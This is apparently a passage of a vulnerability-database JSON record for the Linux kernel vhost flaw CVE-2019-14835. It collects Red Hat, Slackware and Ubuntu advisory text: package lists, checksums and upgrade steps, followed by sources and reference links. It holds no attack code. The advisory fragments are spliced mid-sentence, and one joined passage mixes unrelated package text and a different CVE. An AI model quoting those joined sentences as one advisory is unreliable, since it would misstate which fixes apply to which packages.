7.5):\n\nSource:\nkernel-3.10.0-862.41.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm\nkernel-doc-3.10.0-862.41.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-headers-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm\nperf-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.5):\n\nSource:\nkernel-3.10.0-862.41.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm\nkernel-doc-3.10.0-862.41.2.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-devel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-headers-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.ppc64.rpm\nperf-3.10.0-862.41.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-862.41.2.el7.s390x.rpm\nkernel-devel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-headers-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-862.41.2.el7.s390x.rpm\nperf-3.10.0-862.41.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\npython-perf-3.10.0-862.41.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-headers-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm\nperf-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 7.5):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14835\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/kernel-vhost\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXYiswNzjgjWX9erEAQhd1g//WDRHc/Prfvv6JNbmMdvxJvpXZx3Wc535\n/AQUarXoBalyktM8ucRBOg28X4Eq7Y8WF9jbdoyp8iIrirZQdA7+4yEI6O6GnY2m\nM3sx6Kw9jbNFxP72zUxOK6hMuR8pimz0RWIdc8vQgfA3UuTyjjfvHjjr361FCRHF\nbjRgMl4sOuMbwrxs/h6NgeKVLUw5EoHTrJ6Hc8Vv5wIjyir1bSMH0aikAirkoZ0Y\nWtR3Z7lvODMcY4wKXecyVc/xslg1ioZhS9gGsG+TJ2fUMw7sZr5ERccc+1UWGFUa\n2knyaFEQUSEYweDEsYm3zR3G75rNljzX8VZaEN/ShQwIA46k8J/Z7Wdy7DC6e66/\nFUOKdD8MEjOieoDLfXZpOlBJ1UWBCC8/HYuP7ujFpiCvN7zFBd/HYAIUnhC+y5wg\nXHTc05QJbalfHAntTQRzlwS8Uc746PjBlykrWETVFwyVu3u1cfxbSYsP4TA/6yvE\nAUK1uea0hbg6RgaceZfyIV8YIaaJB5fmS4Ula4p4ppBf5HuF+L0eRl5zYzhA0Ryl\nNSNr5YeIrmCVr6UjEBNZlClSOwi4RN2pQ1VmAcbrsACYuOcKVD1PtoCH087ISIjP\nLej+FZxY423yc9s1/2RxoVIgYwInTzttvauDR8ws4bDmxbPzWrlpT7ciee5kdSQr\njZmQ2x5ylP4=z5bF\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.199/*: Upgraded. \n These updates fix various bugs and security issues. \n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader. \n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition. \n For more information, see:\n Fixed in 4.4.191:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117\n Fixed in 4.4.193:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835\n Fixed in 4.4.194:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821\n Fixed in 4.4.195:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054\n Fixed in 4.4.196:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215\n Fixed in 4.4.197:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976\n Fixed in 4.4.198:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133\n Fixed in 4.4.199:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\n\n0e523f42e759ecc2399f36e37672f110 kernel-generic-4.4.199-i586-1.txz\nee6451f5362008b46fee2e08e3077b21 kernel-generic-smp-4.4.199_smp-i686-1.txz\na8338ef88f2e3ea9c74d564c36ccd420 kernel-headers-4.4.199_smp-x86-1.txz\ncd9e9c241e4eec2fba1dae658a28870e kernel-huge-4.4.199-i586-1.txz\n842030890a424023817d42a83a86a7f4 kernel-huge-smp-4.4.199_smp-i686-1.txz\n257db024bb4501548ac9118dbd2d9ae6 kernel-modules-4.4.199-i586-1.txz\n96377cbaf7bca55aaca70358c63151a7 kernel-modules-smp-4.4.199_smp-i686-1.txz\n0673e86466f9e624964d95107cf6712f kernel-source-4.4.199_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6d1ff428e7cad6caa8860acc402447a1 kernel-generic-4.4.199-x86_64-1.txz\ndadc091dc725b8227e0d1e35098d6416 kernel-headers-4.4.199-x86-1.txz\nf5f4c034203f44dd1513ad3504c42515 kernel-huge-4.4.199-x86_64-1.txz\na5337cd8b2ca80d4d93b9e9688e42b03 kernel-modules-4.4.199-x86_64-1.txz\n5dd6e46c04f37b97062dc9e52cc38add kernel-source-4.4.199-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.199-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.199 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file. Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe following packages have been upgraded to a later upstream version:\nredhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). (CVE-2019-15031)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n linux-image-3.13.0-173-generic 3.13.0-173.224\n linux-image-3.13.0-173-generic-lpae 3.13.0-173.224\n linux-image-3.13.0-173-lowlatency 3.13.0-173.224\n linux-image-3.13.0-173-powerpc-e500 3.13.0-173.224\n linux-image-3.13.0-173-powerpc-e500mc 3.13.0-173.224\n linux-image-3.13.0-173-powerpc-smp 3.13.0-173.224\n linux-image-3.13.0-173-powerpc64-emb 3.13.0-173.224\n linux-image-3.13.0-173-powerpc64-smp 3.13.0-173.224\n linux-image-4.15.0-1059-azure 4.15.0-1059.64~14.04.1\n linux-image-4.4.0-1054-aws 4.4.0-1054.58\n linux-image-4.4.0-164-generic 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-generic-lpae 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-lowlatency 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc-e500mc 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc-smp 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc64-emb 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc64-smp 4.4.0-164.192~14.04.1\n linux-image-aws 4.4.0.1054.55\n linux-image-azure 4.15.0.1059.45\n linux-image-generic 3.13.0.173.184\n linux-image-generic-lpae 3.13.0.173.184\n linux-image-generic-lpae-lts-xenial 4.4.0.164.143\n linux-image-generic-lts-xenial 4.4.0.164.143\n linux-image-lowlatency 3.13.0.173.184\n linux-image-lowlatency-lts-xenial 4.4.0.164.143\n linux-image-powerpc-e500 3.13.0.173.184\n linux-image-powerpc-e500mc 3.13.0.173.184\n linux-image-powerpc-e500mc-lts-xenial 4.4.0.164.143\n linux-image-powerpc-smp 3.13.0.173.184\n linux-image-powerpc-smp-lts-xenial 4.4.0.164.143\n linux-image-powerpc64-emb 3.13.0.173.184\n linux-image-powerpc64-emb-lts-xenial 4.4.0.164.143\n linux-image-powerpc64-smp 3.13.0.173.184\n linux-image-powerpc64-smp-lts-xenial 4.4.0.164.143\n linux-image-server 3.13.0.173.184\n linux-image-virtual 3.13.0.173.184\n linux-image-virtual-lts-xenial 4.4.0.164.143\n\nUbuntu 12.04 ESM:\n linux-image-3.13.0-173-generic 3.13.0-173.224~12.04.1\n linux-image-3.13.0-173-generic-lpae 3.13.0-173.224~12.04.1\n linux-image-3.13.0-173-lowlatency 3.13.0-173.224~12.04.1\n linux-image-3.2.0-143-generic 3.2.0-143.190\n linux-image-3.2.0-143-generic-pae 3.2.0-143.190\n linux-image-3.2.0-143-highbank 3.2.0-143.190\n linux-image-3.2.0-143-omap 3.2.0-143.190\n linux-image-3.2.0-143-powerpc-smp 3.2.0-143.190\n linux-image-3.2.0-143-powerpc64-smp 3.2.0-143.190\n linux-image-3.2.0-143-virtual 3.2.0-143.190\n linux-image-generic 3.2.0.143.158\n linux-image-generic-lpae-lts-trusty 3.13.0.173.161\n linux-image-generic-lts-trusty 3.13.0.173.161\n linux-image-generic-pae 3.2.0.143.158\n linux-image-highbank 3.2.0.143.158\n linux-image-omap 3.2.0.143.158\n linux-image-powerpc 3.2.0.143.158\n linux-image-powerpc-smp 3.2.0.143.158\n linux-image-powerpc64-smp 3.2.0.143.158\n linux-image-server 3.2.0.143.158\n linux-image-virtual 3.2.0.143.158\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7) - noarch, x86_64\n\n3",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14835"
},
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "155212"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154513"
},
{
"db": "PACKETSTORM",
"id": "154572"
},
{
"db": "PACKETSTORM",
"id": "154540"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2019-14835",
"trust": 2.1
},
{
"db": "PACKETSTORM",
"id": "155212",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "154951",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "154572",
"trust": 1.2
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/10/03/1",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/10/09/7",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/09/24/1",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/10/09/3",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/09/17/1",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "154538",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154513",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154602",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154514",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154540",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154565",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154659",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154539",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154570",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154562",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154566",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154563",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154564",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154541",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154558",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154585",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154569",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-201909-807",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-146821",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "155212"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154513"
},
{
"db": "PACKETSTORM",
"id": "154572"
},
{
"db": "PACKETSTORM",
"id": "154540"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"id": "VAR-201909-0695",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
}
],
"trust": 0.40555555
},
"last_update_date": "2026-03-09T20:38:57.948000Z",
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-120",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2828"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2830"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2866"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2901"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2924"
},
{
"trust": 1.1,
"url": "https://seclists.org/bugtraq/2019/sep/41"
},
{
"trust": 1.1,
"url": "https://seclists.org/bugtraq/2019/nov/11"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2019/dsa-4531"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/yw3qnmpenpfegvtofpsnobl7jeijs25p/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kqfy6jyfiq2vfq7qcsxpwtul5zdncjl5/"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhba-2019:2824"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2827"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2829"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2854"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2862"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2863"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2864"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2865"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2867"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2869"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2889"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2899"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2900"
},
{
"trust": 1.1,
"url": "https://usn.ubuntu.com/4135-1/"
},
{
"trust": 1.1,
"url": "https://usn.ubuntu.com/4135-2/"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/09/24/1"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/10/03/1"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/10/09/3"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/10/09/7"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/154572/kernel-live-patch-security-notice-lsn-0056-1.html"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
},
{
"trust": 1.1,
"url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-qemu-en"
},
{
"trust": 1.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14835"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
},
{
"trust": 1.1,
"url": "https://www.openwall.com/lists/oss-security/2019/09/17/1"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
},
{
"trust": 1.1,
